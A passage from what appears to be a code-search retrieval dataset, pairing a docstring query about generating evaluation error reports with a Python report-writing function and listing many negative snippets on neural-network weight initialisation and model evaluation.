\n self.no_of_in_nodes))\n rad = 1 / np.sqrt(self.no_of_hidden_nodes)\n X = truncated_normal(mean=0, sd=1, low=-rad, upp=rad)\n self.who = X.rvs((self.no_of_out_nodes, \n self.no_of_hidden_nodes))", "def weights(self):\n \n n = self.n\n lambda_ = self.alpha**2 * (n +self.kappa) - n\n \n c = .5 / (n + lambda_)\n Wc = np.full(2*n + 1, c)\n Wm = np.full(2*n + 1, c)\n Wc[0] = lambda_ / (n + lambda_) + (1 - self.alpha**2 + self.beta)\n Wm[0] = lambda_ / (n + lambda_)\n \n return Wm, Wc", "def initializeWeights(n_in,n_out):\n \n epsilon = sqrt(6) / sqrt(n_in + n_out + 1);\n W = (np.random.rand(n_out, n_in + 1)*2* epsilon) - epsilon;\n return W", "def initWeights(self):\n self.weights = []\n self.bias = []\n for i, dim in enumerate(self.dimensions[1:]):\n self.weights.append(np.random.uniform(-1,1,(self.dimensions[i],dim)))\n self.bias.append(np.random.uniform(-1,1,dim))", "def initializeWeights(n_in,n_out):\n epsilon = sqrt(6) / sqrt(n_in + n_out + 1);\n W = (np.random.rand(n_out, n_in + 1)*2* epsilon) - epsilon;\n return W", "def initializeWeights(n_in,n_out):\n epsilon = sqrt(6) / sqrt(n_in + n_out + 1);\n W = (np.random.rand(n_out, n_in + 1)*2* epsilon) - epsilon;\n return W", "def initializeWeights(n_in,n_out):\n epsilon = sqrt(6) / sqrt(n_in + n_out + 1);\n W = (np.random.rand(n_out, n_in + 1)*2* epsilon) - epsilon;\n return W", "def initialize_weights(self):\n # compute lmda.\n self.lmda = float(self.c)/float(self.N)\n # bias term. This should not get a regularization penalty.\n self.bias = {}\n # weight vector\n self.w = {}\n # lastW[j] = k, indicates that feature j was last updated at time k.\n self.lastW = {}\n for lbl in self.labels:\n self.bias[lbl] = 0\n self.w[lbl] = {}\n self.lastW[lbl] = {}\n pass", "def default_weight_initializer(self):\n self.biases = [np.random.randn(y, 1) for y in self.sizes[1:]]\n self.weights = [np.random.randn(y, x)/np.sqrt(x)\n for x, y in zip(self.sizes[:-1], self.sizes[1:])]", "def init_weights(model):\n ...", "def initialize_weights_xavier(self):\n\t\tself.weights = [np.random.uniform(-1/sqrt(size1), 1/sqrt(size1)) for size1, size2 in zip(self.sizes[:-1], self.sizes[1:])]\n\t\tself.biases = [np.zeros([size, ]) for size in self.sizes[1:]]", "def my_assign_weights(context, data):\n pass", "def initializeWeights(n_hidden_units, n_inputs, n_outputs):\n W1 = np.random.randn(n_hidden_units, n_inputs) * np.sqrt(1/(n_inputs*n_hidden_units))\n W2 = np.random.randn(n_outputs, n_hidden_units) * np.sqrt(1/(n_hidden_units*n_outputs))\n b1 = np.random.randn(n_hidden_units, 1) * np.sqrt(1/n_hidden_units)\n b2 = np.random.randn(n_outputs, 1) * np.sqrt(1/n_outputs)\n return W1, b1, W2, b2", "def initialize_weights(training_points):\n N = len(training_points)\n ans = {}\n for p in training_points:\n ans[p] = make_fraction(1, N)\n return ans", "def update_weights(self):\n\t\tpass", "def init_weights(self):\n # Initialize weights\n self.apply(self._init_weights)\n # Tie weights if needed\n self.tie_weights()", "def initialize_weights(self, weights_initializer, bias_initializer):\n wshapes = [\n [self.input_size, self.hidden_size[0]],\n [self.hidden_size[0], self.hidden_size[1]],\n [self.hidden_size[1], self.output_size]\n ]\n\n bshapes = [\n [1, self.hidden_size[0]],\n [1, self.hidden_size[1]],\n [1, self.output_size]\n ]\n\n self.weights = [init_weights(s, weights_initializer) for s in wshapes]\n self.biases = [init_weights(s, bias_initializer) for s in bshapes]\n\n self.trainable_variables = self.weights + self.biases", "def setWeights(self, w):\n raise NotImplementedError", "def initialize_weights(self):\n w1 = np.random.uniform(-1.0, 1.0, size = self.n_hidden * (self.n_features + 1)).reshape(self.n_hidden, (self.n_features + 1))/(self.n_features + 1)\n w2 = np.random.uniform(-1.0, 1.0, size=self.n_output*(self.n_hidden+1)).reshape(self.n_output, self.n_hidden+ 1)/(self.n_hidden + 1)\n return w1, w2", "def instantiate_weights(self):\n self.product_embeddings = tf.get_variable(\n name='product_embeddings',\n shape=[50000, 300],\n dtype=tf.float32\n )\n self.aisle_embeddings = tf.get_variable(\n name='aisle_embeddings',\n shape=[250, 50],\n dtype=tf.float32\n )\n self.department_embeddings = tf.get_variable(\n name='department_embeddings',\n shape=[50, 10],\n dtype=tf.float32\n )\n self.W_relu = tf.get_variable(\"W_relu\",shape=[670, 30]) #这个参数后续需要自适应\n self.b_relu = tf.get_variable(\"bias_relu\",shape=[30]) \n self.W_projection = tf.get_variable(\"W_projection\",shape=[30, 1]) \n self.b_projection = tf.get_variable(\"bias_projection\",shape=[1])", "def make_weights_for_balanced_classes(self):\n\n count = [0] * self.get_num_classes()\n\n # label = self.class_map_dict[self.meta_data.loc[image_id]['dx']]\n # labels = [self.class_map_dict[l] for l in self.get_labels()]\n\n labels = self.get_labels()\n\n # Count how many instances there are for each class\n for l in labels:\n count[l] += 1\n\n weight_per_class = [0.] * self.get_num_classes()\n\n N = float(sum(count))\n\n # Assign a weight which is inversely proportional to class frequency\n for i in range(self.get_num_classes()):\n weight_per_class[i] = N/float(count[i])\n\n # Save results for debugging purposes\n self._weight_per_class = weight_per_class\n\n # Now assign a weight to each data point\n weight = [0] * len(labels)\n\n for idx, val in enumerate(labels):\n weight[idx] = weight_per_class[val]\n\n return weight", "def _mutate_weights(self, weights):\n return weights + normal(loc=0, scale=self.standard_deviation, size=weights.shape[0])", "def weights(self) -> List[float]:", "def __initialize_weights__(num_neurons: int) -> np.ndarray:\n\n weights = np.zeros((num_neurons, num_neurons))\n\n return weights", "def init_weights(num_tilings, tiles_per_dim, num_dims, num_actions):\n weights = np.zeros((num_tilings*tiles_per_dim**num_dims*num_actions))\n return weights", "def set_weights(self, weights):\r\n self.weights = weights", "def _generate_weighted_matrices(self):\n self.degree_weighted_matrices = dict()\n mes = []\n args = []\n for metaedge, matrix in self.adj_matrices.items():\n mes.append(metaedge)\n args.append({'matrix': matrix, 'w': self.w, 'degree_fwd': self.out_degree[metaedge],\n 'degree_rev': self.in_degree[metaedge]})\n res = parallel_process(array=args, function=mt.weight_by_degree, use_kwargs=True, n_jobs=self.n_jobs,\n front_num=0)\n for metaedge, matrix in zip(mes, res):\n self.degree_weighted_matrices[metaedge] = matrix", "def ComputeWeights(self, p_float=..., p_float=..., p_float=..., *args, **kwargs):\n ...", "def _build_multinomial_weights(self) -> None:\n weights_obs = ramp_up_weights(\n len(self.obs), self.tpe.full_weight_num, self.tpe.equal_weight\n )\n counts_obs = numpy.bincount(\n self.obs, minlength=len(self.choices), weights=weights_obs\n )\n counts_obs = counts_obs + self.tpe.prior_weight\n self.weights = counts_obs / counts_obs.sum()", "def _set_weights(self, weights):\r\n self.weights = weights.reshape(self.output_size, self.input_size+1)", "def _set_initial_weights(self):\n weights = {'h0': None, 'y': None}\n weights['h0'] = np.array([[-0.6, 0.4, 0.5], [-0.2, 0.8, 0.8]])\n weights['y'] = np.array([[-0.3, -0.4, 0.9]])\n \n return weights", "def init_weights(self, size):\n\n w = np.random.uniform(-0.5, 0.5, size + 1) # creates array with length size\n return w", "def __create_conv_weights(self, conv_weights):\n\n conv_xform_weights = []\n curr_n = 32\n k = 5\n for idx, conv_w in enumerate(conv_weights):\n\n curr_n = self.n_values[idx]\n W = self.__create_W_matrix(curr_n, conv_w)\n conv_xform_weights.append(W)\n\n return conv_xform_weights", "def init_weights(self):\n for i in range(5):\n default_init_weights(getattr(self, f'conv{i+1}'), 0.1)", "def _write_weights(self, write_gates, usage):\n\n write_allocation_weights = self._allocation_weights(write_gates, self.num_write_heads, usage)\n write_gate = write_gates.unsqueeze(-1)\n write_weights = write_gate*write_allocation_weights\n return write_weights", "def default_weights(n):\n return np.array([1/n for _ in range(n)])", "def init_weight(self):\n init_bn(self.norm0)", "def GetTrainWeights(Labels,Weights):\n Weights = np.where(Weights > 0, Weights, 0) #Setting negative weights to zero for training\n ReferenceLength = len(Labels[Labels == 0])\n for Class in np.unique(Labels):\n CWeight = np.sum(Weights[Labels == Class])\n RenormFactor = ReferenceLength/CWeight\n Weights = np.where(Labels != Class,Weights,Weights*RenormFactor)\n \n return Weights", "def init_weights(self):\n # Initialize weights\n self.apply(self._init_weights)", "def init_weights(no_input, no_hidden, no_output):\r\n weight_lst = []\r\n no_of_weights = (no_input * no_hidden) + (no_hidden * no_output)\r\n\r\n for weight in range(no_of_weights):\r\n weight = 0.01 * random.random()\r\n weight_lst.append(weight)\r\n\r\n return weight_lst", "def numWeights(self):\r\n\t\treturn None", "def init_weights(self, input_size=None, min_w=WEIGHT_MIN,\n max_w=WEIGHT_MAX):\n if input_size is None:\n input_size = self.INPUT_SIZE\n\n # Add a bias weight to each neuron\n weights_per_neuron = input_size + 1\n\n self.weights = np.random.rand(self.size, weights_per_neuron) \\\n * (max_w - min_w) + min_w", "def weight(self):", "def init_weights(self, num_features):\n for each_label in self.valid_labels:\n self.weights[each_label] = np.zeros(num_features)", "def init_weights(self) -> None:\n nn.init.kaiming_normal_(self._U)\n nn.init.kaiming_normal_(self._W)\n nn.init.kaiming_normal_(self._V)\n\n nn.init.normal_(self._b)", "def init_weights(self):\n self.embedding.weight.data.uniform_(-0.1, 0.1)\n self.word.bias.data.fill_(0)\n self.word.weight.data.uniform_(-0.1, 0.1)", "def __init__(self, weights):\n self._weights = weights", "def get_weights(self):\n return [self.w, self.b]", "def init_weights(w_shape, layer_index, weight_initializer):\n\n return tf.Variable(weight_initializer(w_shape), name=\"weight{}\".format(layer_index))", "def setupWeightComputation(self, file, weight, p, wordsize, ignoreMSBs = 0):\n file.write(\"weight: BITVECTOR(16);\\n\")\n file.write(self.getWeightString(p, wordsize, ignoreMSBs) + \"\\n\")\n file.write(\"ASSERT(weight = {0:#018b});\\n\".format(weight))\n return", "def gen_weights(self, f_target):\n\n # calculate x and psi\n x_track = self.cs.rollout()\n psi_track = self.gen_psi(x_track)\n\n # efficiently calculate BF weights using weighted linear regression\n self.w = jnp.zeros((self.n_dmps, self.n_bfs))\n for d in range(self.n_dmps):\n # spatial scaling term\n k = self.goal[d] - self.y0[d]\n for b in range(self.n_bfs):\n numer = jnp.sum(x_track * psi_track[:, b] * f_target[:, d])\n denom = jnp.sum(x_track ** 2 * psi_track[:, b])\n self.w[d, b] = numer / denom\n if abs(k) > 1e-5:\n self.w[d, b] /= k\n\n self.w = jnp.nan_to_num(self.w)", "def init_weights(self):\n\n r = np.sqrt(1.) / np.sqrt(self.fc3.in_features +\n self.fc3.out_features)\n self.fc3.weight.data.uniform_(-r, r)\n self.fc3.bias.data.fill_(0)\n r = np.sqrt(1.) / np.sqrt(self.fc2.in_features +\n self.fc2.out_features)\n self.fc2.weight.data.uniform_(-r, r)\n self.fc2.bias.data.fill_(0)\n r = np.sqrt(1.) / np.sqrt(self.fc1.in_features +\n self.fc1.out_features)\n self.fc1.weight.data.uniform_(-r, r)\n self.fc1.bias.data.fill_(0)", "def _make_sample_weights(n_repetitions, n_samples, random_state):\n sample_weights = np.zeros((n_repetitions, n_samples), dtype=np.float64)\n\n for repetition in range(n_repetitions):\n sample_weights[repetition] = random_state.rand(n_samples) + 1\n\n return sample_weights", "def generate_weights(n_features, hidden_layer_sizes, n_out):\n\n weights = []\n biases = []\n\n # Weights from input layer to first hidden layer\n weights.append(init_weight(hidden_layer_sizes[0], n_features))\n biases.append(init_bias(hidden_layer_sizes[0]))\n\n # Weights from one hidden layer to the next\n for i in range(1, hidden_layer_sizes.size):\n weights.append(\n init_weight(hidden_layer_sizes[i],hidden_layer_sizes[i - 1]))\n biases.append(init_bias(hidden_layer_sizes[i]))\n\n # Weights from last hidden layer to output layer\n weights.append(init_weight(n_out, hidden_layer_sizes[-1]))\n biases.append(init_bias(n_out))\n\n return weights, biases", "def weights(self, weights):\n\n self._weights = weights", "def build(self,input_shape):\n\n self.w = self.add_weight(shape=(input_shape[-1],self.units),\n initializer='random_normal',\n trainable=True)\n self.b = self.add_weight(shape=(self.units,),\n initializer='random_normal',\n trainable=True)", "def _init_weights(n_rows, n_cols, std_dev=0.5):\n weights = np.random.randn(n_rows, n_cols) * std_dev\n return weights", "def generate_weighted_graph():\n \n Adj_Matrix = np.array([\n [0.0, 0.2, 0.2, 0.3, 0.2, 0.1],\n [0.1, 0.0, 0.3, 0.3, 0.1, 0.2],\n [0.3, 0.2, 0.0, 0.1, 0.2, 0.2],\n [0.1, 0.4, 0.2, 0.0, 0.2, 0.1],\n [0.2, 0.2, 0.2, 0.2, 0.0, 0.2],\n [0.2, 0.1, 0.1, 0.3, 0.3, 0.0]\n ])\n\n return Adj_Matrix", "def setWeightInitializer(self,weights):\n self.init_w = weights", "def init_weights(self, load_weights=None):\n if load_weights:\n # TODO\n pass\n else:\n # x: lower layer nodes n\n # y: current layer nodes n\n x = self.weights_shape[1]\n y = self.weights_shape[0]\n self.weights = np.random.randn(y, x) / np.sqrt(x) # pylint: disable=no-member\n self.biases = np.random.randn(y, 1) # pylint: disable=no-member", "def _buildWeights(self):\r\n # Compute the spatial tree\r\n kd = spatial.cKDTree(self.XYin)\r\n \r\n # Perform query on all of the points in the grid\r\n dist,self.ind=kd.query(self.XYout,distance_upper_bound=self.maxdist,k=self.NNear)\r\n \r\n self.Nc = np.size(self.ind,axis=0)\r\n print '%d interpolation points.'%self.Nc\r\n # Now loop through and get the weights for each point\r\n self.W = np.zeros((self.NNear,self.Nc))\r\n\r\n # Print percentages\r\n p0=0\r\n pstep=5\r\n for ii in range(0,self.Nc):\r\n \r\n if self.verbose:\r\n pfinish = float(ii)/float(self.Nc)*100.0\r\n if pfinish> p0:\r\n print '%3.1f %% complete...'%pfinish\r\n p0+=pstep\r\n \r\n W = self.getWeights(dist[ii,:],self.XYin[self.ind[ii,:],0],self.XYin[self.ind[ii,:],1])\r\n self.W[:,ii] = W.T", "def init_sg_weights(self):\n n = self.weights_shape[0] # size of current layer\n # pylint: disable=no-member\n A = np.random.randn(n, n) / np.sqrt(n)\n B = np.random.randn(10, n) / np.sqrt(n)\n C = np.random.randn(1, n) / np.sqrt(n)\n # pylint: enable=no-member\n self.sg_weights = [A, B, C]", "def initialize_weights(self, seed=None):\r\n if seed!=None:\r\n np.random.seed(seed)\r\n self.weights = np.random.randn(self.number_of_nodes,self.input_dimensions)", "def WeightInitializer():\n return np.random.uniform(-1, 1)", "def _allocation_weights(self, write_gates, num_writes, usage):\n write_gates = write_gates.unsqueeze(-1)\n allocation_weights = []\n for i in range(num_writes):\n allocation = self._allocate(usage)\n allocation_weights.append(allocation)\n usage = usage + ((1-usage)*write_gates[:, i, :]*allocation_weights[i])\n allocation_weights = torch.stack(allocation_weights, 1)\n return allocation_weights", "def init_weights(self):\n r = np.sqrt(6.) / np.sqrt(self.fc1.in_features +\n self.fc1.out_features)\n self.fc1.weight.data.uniform_(-r, r)\n self.fc1.bias.data.fill_(0)\n r = np.sqrt(6.) / np.sqrt(self.fc2.in_features +\n self.fc2.out_features)\n self.fc2.weight.data.uniform_(-r, r)\n self.fc2.bias.data.fill_(0)", "def calc_assn_weights():\n\t\n\t\t\t#\n\t\t\t#\n\ttext(\"\"\"INSERT INTO assignments (mentor_id, course_id, cost)\n\t\t\tSELECT M.mentor_id, C.course_id, SUM(COALESCE(PW.weight_value,PT.def_weight_val))\n\t\t\tFROM mentors M, courses C\n\t\t\tJOIN course2pref C2P ON C2P.course_id = C.course_id\n\t\t\tJOIN prefs P ON P.pref_id = C2P.pref_id\n\t\t\tJOIN pref_types PT ON PT.pref_type_id = P.pref_type_id\n\t\t\tJOIN pref_weights PW ON PW.pref_type_id = P.pref_type_id\n\t\t\tLEFT JOIN choices Ch ON Ch.mentor_id = M.mentor_id AND Ch.weight_id = PW.pref_id", "def get_data_with_weights(self):\n weights = np.zeros((self.contexts.shape[0], self.num_actions))\n a_ind = np.array([(i, val) for i, val in enumerate(self.actions)])\n weights[a_ind[:, 0], a_ind[:, 1]] = 1.0\n return self.contexts, self.rewards, weights", "def apply_weights(self):\n w0_array = np.ones(self.N)*self.w0\n return w0_array + self.X.dot(self.w)", "def get_weights(self, nn_weights, rov_id): # Get weights from CCEA population\n\n for w in range(self.n_weights):\n self.weights[rov_id, w] = nn_weights[w]", "def _degree_weight_weighted_matrices(self):\n for meta_edge, matrix in self.degree_weighted_matrices.items():\n self.degree_weighted_matrices[meta_edge] = matrix.multiply(self.weighted_adj_matrices[meta_edge])", "def initialize_weights(self):\n weights_initializer.WeightsInitializer.initialize_layer_or_model(\n self._batch)", "def fama2(self, n, weight, nums):\n ws = {0}\n for i in range(0, n):\n ts = set()\n for j in range(0, nums[i]):\n for w in ws:\n ts.add(weight[i] * (j + 1) + w)\n ws = ws.union(ts)\n for j in range(0, nums[i]):\n ws.add(weight[i] * (j + 1))\n return len(ws)", "def weight_setup(self, weighting):\n if weighting == \"overlap\":\n self.weights = overlap_generator(overlap, self.graph)\n elif weighting == \"unit\":\n self.weights = overlap_generator(unit, self.graph)\n elif weighting == \"min_norm\":\n self.weights = overlap_generator(min_norm, self.graph)\n else:\n self.weights = overlap_generator(normalized_overlap, self.graph)", "def weights(self, pad=0, feather=0, apply=False, mode='raised cosine'):\n # find dimensions of matrix\n sh = getattr(self, self.fields[0]).shape\n if len(sh)==3:\n ny, nx, nband = sh\n else:\n nband =1\n ny, nx = sh\n # allocate for weights matrix\n self.weight = np.ones((ny,nx), dtype=float)\n # feathering the weight matrix\n if feather:\n if mode == 'raised cosine':\n self.raised_cosine_weights(pad, feather)\n elif mode == 'gaussian':\n self.gaussian_weights(pad, feather)\n if pad:\n self.pad_edges(pad)\n # if applying the weights to the original z data\n if apply:\n for field in self.fields:\n if nband > 1:\n for band in range(nband):\n getattr(self, field)[:,:,band] *= self.weight\n else:\n getattr(self, field)[:,:] *= self.weight\n return self", "def get_weights(self, size, name='W'):\n\t\treturn self._initW(size, name)", "def set_weights(self, weights):\n self._weights = weights\n self.normalize_weights() ########################added\n #self.get_weights()", "def get_weights(self):\n return []", "def __init__(self, weights:np.ndarray):\n self.w = weights.copy()" ]
[ "0.7466049", "0.7392558", "0.7357619", "0.72760403", "0.71676654", "0.7089966", "0.7077687", "0.70380753", "0.7031394", "0.7028164", "0.7026333", "0.70108604", "0.69093025", "0.69080865", "0.68695116", "0.68506765", "0.6768174", "0.6768174", "0.6765752", "0.67634475", "0.67488414", "0.6747982", "0.6745061", "0.6725261", "0.67054415", "0.669429", "0.669429", "0.669429", "0.66904694", "0.66880125", "0.6683625", "0.66819024", "0.66602176", "0.66510737", "0.66196394", "0.66082466", "0.658591", "0.6557125", "0.6536917", "0.6532068", "0.65275294", "0.6516978", "0.65090597", "0.64876497", "0.6464693", "0.6462223", "0.6461195", "0.6449746", "0.64389765", "0.64385223", "0.6432014", "0.6425508", "0.641518", "0.6407862", "0.6401697", "0.63959134", "0.6385981", "0.63849574", "0.63814014", "0.63799906", "0.6375351", "0.6368261", "0.6366396", "0.6360322", "0.63579106", "0.63566613", "0.6348568", "0.6339457", "0.6321952", "0.63057154", "0.6292362", "0.62876654", "0.628676", "0.62816834", "0.62716204", "0.6270287", "0.62692904", "0.62685794", "0.62471855", "0.62447095", "0.6237987", "0.6237306", "0.6224132", "0.62220436", "0.6208041", "0.6205188", "0.62011504", "0.6199975", "0.61994743", "0.61925566", "0.61908275", "0.61783296", "0.61746085", "0.6172446", "0.6167409", "0.6158438", "0.6148874", "0.61458814", "0.61452067", "0.613003" ]
0.6555952
38
Runs evaluate on the provided data and generates a detailed error report
def make_report(self, report_name, id_test, x_test, y_test, country_test, frame_test): if not os.path.exists('Reports/' + report_name): os.mkdir('Reports/' + report_name) results = self.predict(x_test) # Generate detailied evaluation report header = 'Country,Child,Frame' for output_layer in self.get_config()['output_layers']: header += ',{}_Actual'.format(output_layer[0]) for output_layer in self.get_config()['output_layers']: header += ',{}_Prediction'.format(output_layer[0]) header += '\n' with open('Reports/{}/evaluation_report.txt'.format(report_name), 'a') as f: if os.stat('Reports/{}/evaluation_report.txt'.format(report_name)).st_size == 0: f.write(header) for row in range(len(results)): entry = ','.join([str(i) for i in country_test[row]]) + ',' entry += ','.join([str(i) for i in id_test[row]]) + ',' entry += ','.join([str(i) for i in frame_test[row]]) + ',' entry += ','.join([str(i) for i in y_test[row]]) + ',' entry += ','.join([str(i) for i in results[row]]) + '\n' f.write(entry) # Generate report of summary statistics cultures = np.unique(country_test) for c in cultures: culture_rows = np.where(country_test == c)[0] # get row numbers for culture c culture_ids = id_test[culture_rows] # get ID rows for culture c unique_ids = np.unique(culture_ids) # get unique IDs for culture c for u in unique_ids: all_id_rows = np.where(id_test == u)[0] id_rows = np.intersect1d(all_id_rows, culture_rows) # get ID rows for child u id_icc = icc(results[id_rows], y_test[id_rows])[0] # compute ICC for child u id_pcc = pcc(results[id_rows], y_test[id_rows])[0][0] # compute PCC for child u id_ccc = ccc(results[id_rows], y_test[id_rows]) # compute CCC for child u id_mae = mae(results[id_rows], y_test[id_rows]) # compute MAE for child u icc_entry = '{},{},{}\n'.format(c, u, id_icc) pcc_entry = '{},{},{}\n'.format(c, u, id_pcc) ccc_entry = '{},{},{}\n'.format(c, u, id_ccc) mae_entry = '{},{},{}\n'.format(c, u, id_mae) with open('Reports/{}/icc_report.txt'.format(report_name), 'a') as f: f.write(icc_entry) with open('Reports/{}/pcc_report.txt'.format(report_name), 'a') as f: f.write(pcc_entry) with open('Reports/{}/ccc_report.txt'.format(report_name), 'a') as f: f.write(ccc_entry) with open('Reports/{}/mae_report.txt'.format(report_name), 'a') as f: f.write(mae_entry) return results
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def evaluate(self, test_data):\n result = self.model.run(test_data)\n self._save_result(result)", "def evaluate(self, dataset):\n\t\tpass", "def evaluate(\n self,\n test_data=None,\n print_report=True,\n save_path=\"ktrain_classification_report.csv\",\n class_names=[],\n ):\n return self.validate(\n val_data=test_data,\n print_report=print_report,\n save_path=save_path,\n class_names=class_names,\n )", "def evaluate():\n click.echo(\"Not implemented yet. In the future, this command will be used for evaluation.\")\n sys.exit(-2)", "def test_evaluate(self):\n # Check build does not raise errors\n dataset = KDDCupDataset()\n dataset.create_fixed_samples(\n *self.data, samples_num=1, partition_sizes=self.partition_sizes)\n dataset.set_current_sample(0)\n model = self.MODEL(dataset, **self.model_arguments)\n model.fit(training_epochs=50)\n metric = model.evaluate('test')\n self.assertLessEqual(0, metric)\n self.assertGreaterEqual(1, metric)", "def evaluate(self, test_data, test_labels):\n raise NotImplementedError", "def evaluate(parser):\n required_args = (\n 'train_tfrecord',\n 'valid_tfrecord',\n 'predicted_data',\n 'actual_data',\n )\n cli_args = add_all_args(parser, EVALUATION, *required_args)\n evaluator = Evaluator(\n input_shape=cli_args.input_shape,\n model_configuration=cli_args.model_cfg,\n train_tf_record=cli_args.train_tfrecord,\n valid_tf_record=cli_args.valid_tfrecord,\n classes_file=cli_args.classes,\n max_boxes=cli_args.max_boxes,\n iou_threshold=cli_args.iou_threshold,\n score_threshold=cli_args.score_threshold,\n )\n predicted = pd.read_csv(cli_args.predicted_data)\n actual = pd.read_csv(cli_args.actual_data)\n evaluator.calculate_map(\n prediction_data=predicted,\n actual_data=actual,\n min_overlaps=cli_args.min_overlaps,\n display_stats=cli_args.display_stats,\n save_figs=cli_args.save_figs,\n plot_results=cli_args.plot_stats,\n )", "def evaluate(model, datagen, X_test, Y_test, batch_size, save_folder_path=None):\n\n print(\"[INFO] Evaluating model...\")\n\n scores = model.evaluate_generator(\n datagen.flow(X_test, Y_test, batch_size=batch_size),\n verbose=1)\n \n print(\"[INFO] Evaluation results:\\n{0}: {1:.2f}\\n{2}: {3:.2f}\".format(model.metrics_names[0], scores[0]*100, model.metrics_names[1], scores[1]*100))\n \n if save_folder_path is not None:\n # Write results to path\n assert os.path.isdir(save_folder_path) == True, \"Unable to save evaluation results, save_folder_path is not a folder\"\n eval_results_path = save_folder_path + \"/eval_results.txt\"\n eval_handle = open(eval_results_path, 'w')\n eval_handle.write(\"Model name: {}\\n\\n\".format(MODEL_NAME))\n eval_handle.write(\"Evaluation results:\\n{0}: {1:.2f}\\n{2}: {3:.2f}\".format(model.metrics_names[0], scores[0]*100, model.metrics_names[1], scores[1]*100))\n eval_handle.close()", "def _evaluate_model(\n run_id: str, dataset_filename: str, dataset_sampling_column: str = None\n):\n fix_multiprocessing_with_keras_on_macos()\n\n run = _get_run(run_id)\n hyperparameters = run.config\n\n # no need to run this on a gpu since it's 1 epoch\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\n with ModelBestH5File(run) as model_h5_filepath:\n model = _load_untrainable_model(hyperparameters, model_h5_filepath)\n\n model_name = run.config[\"model_name\"]\n x, y = _get_prepared_dataset(\n model_name, hyperparameters, dataset_filename, dataset_sampling_column\n )\n\n wandb.init(\n config={\n \"run_id\": run_id,\n \"dataset_filename\": dataset_filename,\n \"dataset_sampling_column\": dataset_sampling_column,\n },\n tags=[\"model-evaluation\"],\n )\n\n batch_size = hyperparameters[\"batch_size\"]\n label_scale_factor_mmhg = hyperparameters[\"label_scale_factor_mmhg\"]\n acceptable_error_mg_l = hyperparameters[\"acceptable_error_mg_l\"]\n acceptable_fraction_outside_error = hyperparameters[\n \"acceptable_fraction_outside_error\"\n ]\n\n # we're using fit() instead of evaluate() to get the functionality of these callbacks\n # training performance in the results should be ignored, as it can be affected by some\n # training-only layers such as dropout\n model.fit(\n x,\n y,\n batch_size=batch_size,\n epochs=1,\n verbose=2,\n validation_data=(x, y),\n callbacks=[\n ThresholdValMeanAbsoluteErrorOnCustomMetric(\n acceptable_fraction_outside_error=acceptable_fraction_outside_error,\n acceptable_error_mg_l=acceptable_error_mg_l,\n ),\n WandbCallback(verbose=1, monitor=\"val_adjusted_mean_absolute_error\"),\n LogPredictionsAndWeights(\n metric=\"val_adjusted_mean_absolute_error\",\n dataset=([], [], x, y),\n label_scale_factor_mmhg=label_scale_factor_mmhg,\n ),\n ],\n )\n\n # returning model and dataset for use in jupyter notebooks\n return model, (x, y)", "def evaluate_data(df_train, w_train, df_test, w_test,\n evaluation_setups=None, preprocessing=None):\n if evaluation_setups is None:\n evaluation_setups = standard_evaluation_setups\n if preprocessing is None:\n preprocessing = preprocess\n if (\"weights\" in df_train) and df_train[\"weights\"].size > 0:\n weights = df_train[\"weights\"].as_matrix().squeeze()\n else:\n weights = np.ones(df_train.shape[0])\n\n # create a new dataframe which will hold all the generated errors\n df = pd.DataFrame()\n for one_w_train, one_w_test in zip(w_train, w_test):\n # setup testing function\n X_test, y_test = preprocessing(df_test, snr=one_w_test)\n # extract noisy data\n X_train, y_train = preprocessing(df_train, snr=one_w_train)\n for e in evaluation_setups:\n regressor = e.regressor\n regressor.fit(X_train, y_train, weights)\n y_pred = regressor.predict(X_test)\n # save results to a dataframe\n errors = np.abs(y_pred - y_test)\n errors = errors.reshape(len(errors), 1)\n current_df = DataFrame(errors * 100,\n columns=[\"Errors\"])\n current_df[\"Method\"] = e.name\n current_df[\"SNR\"] = int(one_w_test)\n df = pd.concat([df, current_df], ignore_index=True)\n\n return df", "def evaluate(self) :\n pass", "def evaluate(self):\n pass", "def evaluate(self):\n pass", "def evaluated_data(self) -> Dict:\n if not self.eval_data:\n raise Exception(\"Evaluation Failed\")\n\n statistics = [stat['statistics'] for stat in self.eval_data]\n for count, stat in enumerate(statistics):\n if stat:\n eval_data = stat.split(\"=\")\n char_error = re.findall(r\"\\d+\\.\\d+\", eval_data[-2])[0]\n word_error = eval_data[-1]\n\n self.eval_data[count]['character_error'] = float(char_error)\n self.eval_data[count]['word_error'] = float(word_error)\n del self.eval_data[count]['statistics']\n\n return self.eval_data", "def Evaluate():\n global reg\n reg = ModelRegression()\n \n # Retrieve dataset files\n data_fls, ref_fls = LoadTroikaDataset()\n errs, confs = [], []\n for data_fl, ref_fl in zip(data_fls, ref_fls):\n # Run the pulse rate algorithm on each trial in the dataset\n errors, confidence = RunPulseRateAlgorithm(data_fl, ref_fl)\n errs.append(errors)\n confs.append(confidence)\n # Compute aggregate error metric\n errs = np.hstack(errs)\n confs = np.hstack(confs)\n return AggregateErrorMetric(errs, confs)", "def validate(self):\n self.set_model_mode('eval')\n self.evaluator.reset()\n losses = MetricMeter()\n\n print('Do evaluation on {} set'.format('valid set'))\n data_loader = self.val_loader\n assert data_loader is not None\n for batch_idx, batch in enumerate(data_loader):\n input, label = self.parse_batch_test(batch)\n loss = self.forward_backward(batch, backprob=False)\n losses.update(loss)\n # total_loss += loss['loss']\n output = self.model_inference(input)\n self.evaluator.process(output, label)\n\n results = self.evaluator.evaluate()\n total_loss = losses.meters['loss_x'].avg\n\n for k, v in results.items():\n tag = '{}/{}'.format('validation', k)\n self.write_scalar(tag, v, self.epoch)\n # if full_results:\n return [total_loss,losses.dict_results(),results]\n # return total_loss", "def evaluate(self, dataset):\n logging.info('Start evaluation')\n\n loss, predictions, labels = self.run_one_epoch(dataset, RunnerPhase.VALIDATE)\n\n metrics_dict = self.metric_class.get_metrics_dict(predictions, labels)\n\n eval_info = self.metric_class.metrics_dict_to_str(metrics_dict)\n\n logging.info(eval_info)\n\n logging.info('Evaluation finished')\n\n return metrics_dict", "def evaluate(cfg: DictConfig):\n\n experiments = cfg.get('experiment_type', f'{cfg.model.name}_only')\n fixed_t0 = cfg.get('fixed_t0', False)\n ext = '_fixedT0' if fixed_t0 else ''\n\n base_dir = cfg.device.root\n datasource = cfg.datasource.name\n\n if experiments == 'ablations':\n models = {\n 'FluxRGNN': ['final',\n 'final_without_encoder',\n 'final_without_boundary'],\n 'LocalLSTM': ['final']\n }\n elif experiments == 'final':\n models = {\n 'FluxRGNN': ['final'],\n 'GAM': ['final'],\n 